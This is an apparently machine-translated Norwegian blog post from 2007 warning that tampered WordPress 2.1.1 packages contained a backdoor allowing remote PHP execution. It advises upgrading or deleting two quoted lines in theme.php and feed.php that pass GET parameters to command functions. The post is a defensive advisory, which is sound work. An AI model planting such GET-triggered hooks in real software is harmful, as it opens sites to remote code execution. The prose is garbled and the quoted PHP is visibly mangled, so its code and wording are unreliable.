Abonner på nyhetsbrev eller RSS feed for å motta oppdateringer automatisk bloggen!

Wordpress 2.1.1 er farlig!



Her er hvordan laget Wordpress definerer de siste versjon av WP. Årsaken er enkel: for noen dager siden en cracker har brutt noen av serveren worpress.org, administrerende å endre installasjonspakke som vanligvis er lastet ned: den forandringer synes å innebære at bare noen få filer til å tillate ekstern kjøring av php-kode. For å løse dette problemet, er det to alternativer:

    1. Last ned versjon 2.1.2 omgående utstedt av utviklerne av Wordpress og oppgradere.
    2. Fjern ved siden av ondsinnet kode (hvis du liker meg du ikke ønsker / tid til å installere den nye versjonen).
    Det er ganske enkelt:
    - Identifisere og fjerne filen "wp-includes/theme.php" følgende linje med kode: 
      if ($ _GET [ "IZ"]) (get_theme_mcommand ($ _GET [ "IZ "]);)

    - Identifisere og fjerne filen "wp-includes/feed.php" følgende linje med kode: 

      if ($ _GET [ 'ix']) (comment_text_phpfilter ($ _GET [ 'ix']);)


Likte du denne artikkelen? Registrer deg nå for å motta oppdateringer eller nyhetsartikler:
Abonner på RSS-feeds skriv til RSS-feed


Dato Skrevet den 6. mars 2007 kl 12:06 i Sikkerhet, Web
Deling Aksje | Tags: Sikkerhet, Web,

Fortsatt ingen kommentar "

Kommentarer RSS feed for dette innlegget. TrackBack URI

Legg igjen en kommentar

XHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>


Nothing2Hide © 2006 All rights reserved.

Lisens | Disclaimer

Lukke
Send e-post